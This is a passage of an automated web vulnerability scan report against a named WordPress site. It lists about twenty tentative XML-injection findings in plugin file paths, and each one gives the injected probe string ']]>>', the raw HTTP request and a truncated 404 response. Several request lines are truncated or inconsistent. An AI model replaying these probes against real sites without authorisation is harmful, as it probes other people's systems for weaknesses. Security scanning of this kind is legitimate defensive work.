The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.Request
GET /wp-content]]>>/plugins/nextgen-gallery Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 404 Not Found Date: Sat, 23 Apr 2011 07:55:06 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Sat, 23 Apr 2011 07:55:21 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27823 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... <script type="text/javascript"> var flashvars = {}; flashvars.xml = "http://www.ligattse var attributes = {}; attributes.wmode = "transparent"; attributes.id = "slider"; swfobject.embedSWF("htt ...[SNIP]... |
3.6. http://www.ligattsecurity.com/wp-content/plugins/nextgen-gallery/css/nggallery.css [REST URL parameter 2] previous next
Summary
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.ligattsecurity |
Path: | /wp-content/plugins |
Issue detail
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.Request
GET /wp-content/plugins]]>>/nextgen-gallery/css Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 404 Not Found Date: Sat, 23 Apr 2011 08:21:20 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Sat, 23 Apr 2011 08:22:42 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27823 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... <script type="text/javascript"> var flashvars = {}; flashvars.xml = "http://www.ligattse var attributes = {}; attributes.wmode = "transparent"; attributes.id = "slider"; swfobject.embedSWF("htt ...[SNIP]... |
3.7. http://www.ligattsecurity.com/wp-content/plugins/nextgen-gallery/css/nggallery.css [REST URL parameter 3] previous next
Summary
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.ligattsecurity |
Path: | /wp-content/plugins |
Issue detail
The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.Request
GET /wp-content/plugins Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 404 Not Found Date: Sat, 23 Apr 2011 08:45:15 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Sat, 23 Apr 2011 08:46:55 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27823 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... <script type="text/javascript"> var flashvars = {}; flashvars.xml = "http://www.ligattse var attributes = {}; attributes.wmode = "transparent"; attributes.id = "slider"; swfobject.embedSWF("htt ...[SNIP]... |
3.8. http://www.ligattsecurity.com/wp-content/plugins/nextgen-gallery/css/nggallery.css [REST URL parameter 4] previous next
Summary
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.ligattsecurity |
Path: | /wp-content/plugins |
Issue detail
The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.Request
GET /wp-content/plugins Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 404 Not Found Date: Sat, 23 Apr 2011 09:11:01 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Sat, 23 Apr 2011 09:11:37 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27823 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... <script type="text/javascript"> var flashvars = {}; flashvars.xml = "http://www.ligattse var attributes = {}; attributes.wmode = "transparent"; attributes.id = "slider"; swfobject.embedSWF("htt ...[SNIP]... |
3.9. http://www.ligattsecurity.com/wp-content/plugins/nextgen-gallery/css/nggallery.css [REST URL parameter 5] previous next
Summary
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.ligattsecurity |
Path: | /wp-content/plugins |
Issue detail
The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.Request
GET /wp-content/plugins Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 404 Not Found Date: Sat, 23 Apr 2011 09:35:58 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Sat, 23 Apr 2011 09:36:20 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27823 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... <script type="text/javascript"> var flashvars = {}; flashvars.xml = "http://www.ligattse var attributes = {}; attributes.wmode = "transparent"; attributes.id = "slider"; swfobject.embedSWF("htt ...[SNIP]... |
3.10. http://www.ligattsecurity.com/wp-content/plugins/nextgen-gallery/js/jquery.cycle.all.min.js [REST URL parameter 1] previous next
Summary
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.ligattsecurity |
Path: | /wp-content/plugins |
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.Request
GET /wp-content]]>>/plugins/nextgen-gallery Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 404 Not Found Date: Sat, 23 Apr 2011 07:55:12 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Sat, 23 Apr 2011 07:55:14 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27832 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... <script type="text/javascript"> var flashvars = {}; flashvars.xml = "http://www.ligattse var attributes = {}; attributes.wmode = "transparent"; attributes.id = "slider"; swfobject.embedSWF("htt ...[SNIP]... |
3.11. http://www.ligattsecurity.com/wp-content/plugins/nextgen-gallery/js/jquery.cycle.all.min.js [REST URL parameter 2] previous next
Summary
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.ligattsecurity |
Path: | /wp-content/plugins |
Issue detail
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.Request
GET /wp-content/plugins]]>>/nextgen-gallery/js Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 404 Not Found Date: Sat, 23 Apr 2011 08:20:59 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Sat, 23 Apr 2011 08:21:04 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27832 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... <script type="text/javascript"> var flashvars = {}; flashvars.xml = "http://www.ligattse var attributes = {}; attributes.wmode = "transparent"; attributes.id = "slider"; swfobject.embedSWF("htt ...[SNIP]... |
3.12. http://www.ligattsecurity.com/wp-content/plugins/nextgen-gallery/js/jquery.cycle.all.min.js [REST URL parameter 3] previous next
Summary
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.ligattsecurity |
Path: | /wp-content/plugins |
Issue detail
The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.Request
GET /wp-content/plugins Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 404 Not Found Date: Sat, 23 Apr 2011 08:35:44 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Sat, 23 Apr 2011 08:36:14 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27832 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... <script type="text/javascript"> var flashvars = {}; flashvars.xml = "http://www.ligattse var attributes = {}; attributes.wmode = "transparent"; attributes.id = "slider"; swfobject.embedSWF("htt ...[SNIP]... |
3.13. http://www.ligattsecurity.com/wp-content/plugins/nextgen-gallery/js/jquery.cycle.all.min.js [REST URL parameter 4] previous next
Summary
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.ligattsecurity |
Path: | /wp-content/plugins |
Issue detail
The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.Request
GET /wp-content/plugins Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 404 Not Found Date: Sat, 23 Apr 2011 09:01:13 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Sat, 23 Apr 2011 09:01:18 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27832 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... <script type="text/javascript"> var flashvars = {}; flashvars.xml = "http://www.ligattse var attributes = {}; attributes.wmode = "transparent"; attributes.id = "slider"; swfobject.embedSWF("htt ...[SNIP]... |
3.14. http://www.ligattsecurity.com/wp-content/plugins/nextgen-gallery/js/jquery.cycle.all.min.js [REST URL parameter 5] previous next
Summary
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.ligattsecurity |
Path: | /wp-content/plugins |
Issue detail
The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.Request
GET /wp-content/plugins Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 404 Not Found Date: Sat, 23 Apr 2011 09:30:18 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Sat, 23 Apr 2011 09:30:36 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27832 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... <script type="text/javascript"> var flashvars = {}; flashvars.xml = "http://www.ligattse var attributes = {}; attributes.wmode = "transparent"; attributes.id = "slider"; swfobject.embedSWF("htt ...[SNIP]... |
3.15. http://www.ligattsecurity.com/wp-content/plugins/nextgen-gallery/js/ngg.slideshow.min.js [REST URL parameter 1] previous next
Summary
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.ligattsecurity |
Path: | /wp-content/plugins |
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.Request
GET /wp-content]]>>/plugins/nextgen-gallery Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 404 Not Found Date: Sat, 23 Apr 2011 07:56:42 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Sat, 23 Apr 2011 07:56:51 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27829 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... <script type="text/javascript"> var flashvars = {}; flashvars.xml = "http://www.ligattse var attributes = {}; attributes.wmode = "transparent"; attributes.id = "slider"; swfobject.embedSWF("htt ...[SNIP]... |
3.16. http://www.ligattsecurity.com/wp-content/plugins/nextgen-gallery/js/ngg.slideshow.min.js [REST URL parameter 2] previous next
Summary
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.ligattsecurity |
Path: | /wp-content/plugins |
Issue detail
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.Request
GET /wp-content/plugins]]>>/nextgen-gallery/js/ngg Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 404 Not Found Date: Sat, 23 Apr 2011 08:14:52 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Sat, 23 Apr 2011 08:15:40 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27829 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... <script type="text/javascript"> var flashvars = {}; flashvars.xml = "http://www.ligattse var attributes = {}; attributes.wmode = "transparent"; attributes.id = "slider"; swfobject.embedSWF("htt ...[SNIP]... |
3.17. http://www.ligattsecurity.com/wp-content/plugins/nextgen-gallery/js/ngg.slideshow.min.js [REST URL parameter 3] previous next
Summary
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.ligattsecurity |
Path: | /wp-content/plugins |
Issue detail
The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.Request
GET /wp-content/plugins Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 404 Not Found Date: Sat, 23 Apr 2011 08:44:58 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Sat, 23 Apr 2011 08:45:17 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27829 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... <script type="text/javascript"> var flashvars = {}; flashvars.xml = "http://www.ligattse var attributes = {}; attributes.wmode = "transparent"; attributes.id = "slider"; swfobject.embedSWF("htt ...[SNIP]... |
3.18. http://www.ligattsecurity.com/wp-content/plugins/nextgen-gallery/js/ngg.slideshow.min.js [REST URL parameter 4] previous next
Summary
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.ligattsecurity |
Path: | /wp-content/plugins |
Issue detail
The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.Request
GET /wp-content/plugins Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 404 Not Found Date: Sat, 23 Apr 2011 09:00:47 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Sat, 23 Apr 2011 09:00:59 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27829 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... <script type="text/javascript"> var flashvars = {}; flashvars.xml = "http://www.ligattse var attributes = {}; attributes.wmode = "transparent"; attributes.id = "slider"; swfobject.embedSWF("htt ...[SNIP]... |
3.19. http://www.ligattsecurity.com/wp-content/plugins/nextgen-gallery/js/ngg.slideshow.min.js [REST URL parameter 5] previous next
Summary
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.ligattsecurity |
Path: | /wp-content/plugins |
Issue detail
The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.Request
GET /wp-content/plugins Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 404 Not Found Date: Sat, 23 Apr 2011 09:29:34 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Sat, 23 Apr 2011 09:29:43 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27829 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... <script type="text/javascript"> var flashvars = {}; flashvars.xml = "http://www.ligattse var attributes = {}; attributes.wmode = "transparent"; attributes.id = "slider"; swfobject.embedSWF("htt ...[SNIP]... |
3.20. http://www.ligattsecurity.com/wp-content/plugins/seo-pressor/templates/css/styles.css [REST URL parameter 1] previous next
Summary
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.ligattsecurity |
Path: | /wp-content/plugins/seo |
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.Request
GET /wp-content]]>>/plugins/seo-pressor Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 404 Not Found Date: Sat, 23 Apr 2011 08:05:32 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Sat, 23 Apr 2011 08:05:59 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27826 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... <script type="text/javascript"> var flashvars = {}; flashvars.xml = "http://www.ligattse var attributes = {}; attributes.wmode = "transparent"; attributes.id = "slider"; swfobject.embedSWF("htt ...[SNIP]... |
3.21. http://www.ligattsecurity.com/wp-content/plugins/seo-pressor/templates/css/styles.css [REST URL parameter 2] previous next
Summary
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.ligattsecurity |
Path: | /wp-content/plugins/seo |
Issue detail
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.Request
GET /wp-content/plugins]]>>/seo-pressor/templates Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 404 Not Found Date: Sat, 23 Apr 2011 08:35:57 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Sat, 23 Apr 2011 08:36:47 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27826 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... <script type="text/javascript"> var flashvars = {}; flashvars.xml = "http://www.ligattse var attributes = {}; attributes.wmode = "transparent"; attributes.id = "slider"; swfobject.embedSWF("htt ...[SNIP]... |
3.22. http://www.ligattsecurity.com/wp-content/plugins/seo-pressor/templates/css/styles.css [REST URL parameter 3] previous next
Summary
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.ligattsecurity |
Path: | /wp-content/plugins/seo |
Issue detail
The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.Request
GET /wp-content/plugins/seo Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 404 Not Found Date: Sat, 23 Apr 2011 09:06:01 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Sat, 23 Apr 2011 09:06:07 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27826 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... <script type="text/javascript"> var flashvars = {}; flashvars.xml = "http://www.ligattse var attributes = {}; attributes.wmode = "transparent"; attributes.id = "slider"; swfobject.embedSWF("htt ...[SNIP]... |
3.23. http://www.ligattsecurity.com/wp-content/plugins/seo-pressor/templates/css/styles.css [REST URL parameter 4] previous next
Summary
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.ligattsecurity |
Path: | /wp-content/plugins/seo |
Issue detail
The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.Request
GET /wp-content/plugins/seo Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 404 Not Found Date: Sat, 23 Apr 2011 09:26:40 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Sat, 23 Apr 2011 09:26:58 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27826 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... <script type="text/javascript"> var flashvars = {}; flashvars.xml = "http://www.ligattse var attributes = {}; attributes.wmode = "transparent"; attributes.id = "slider"; swfobject.embedSWF("htt ...[SNIP]... |
3.24. http://www.ligattsecurity.com/wp-content/plugins/si-captcha-for-wordpress/captcha-secureimage/si_captcha.js [REST URL parameter 1] previous next
Summary
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.ligattsecurity |
Path: | /wp-content/plugins/si |
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.Request
GET /wp-content]]>>/plugins/si-captcha-for Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 404 Not Found Date: Sat, 23 Apr 2011 09:35:55 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Sat, 23 Apr 2011 09:36:15 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27848 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... <script type="text/javascript"> var flashvars = {}; flashvars.xml = "http://www.ligattse var attributes = {}; attributes.wmode = "transparent"; attributes.id = "slider"; swfobject.embedSWF("htt ...[SNIP]... |
3.25. http://www.ligattsecurity.com/wp-content/plugins/superslider/js/mootools-1.2.3-core-yc.js [REST URL parameter 1] previous next
Summary
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.ligattsecurity |
Path: | /wp-content/plugins |
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.Request
GET /wp-content]]>>/plugins/superslider/js Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
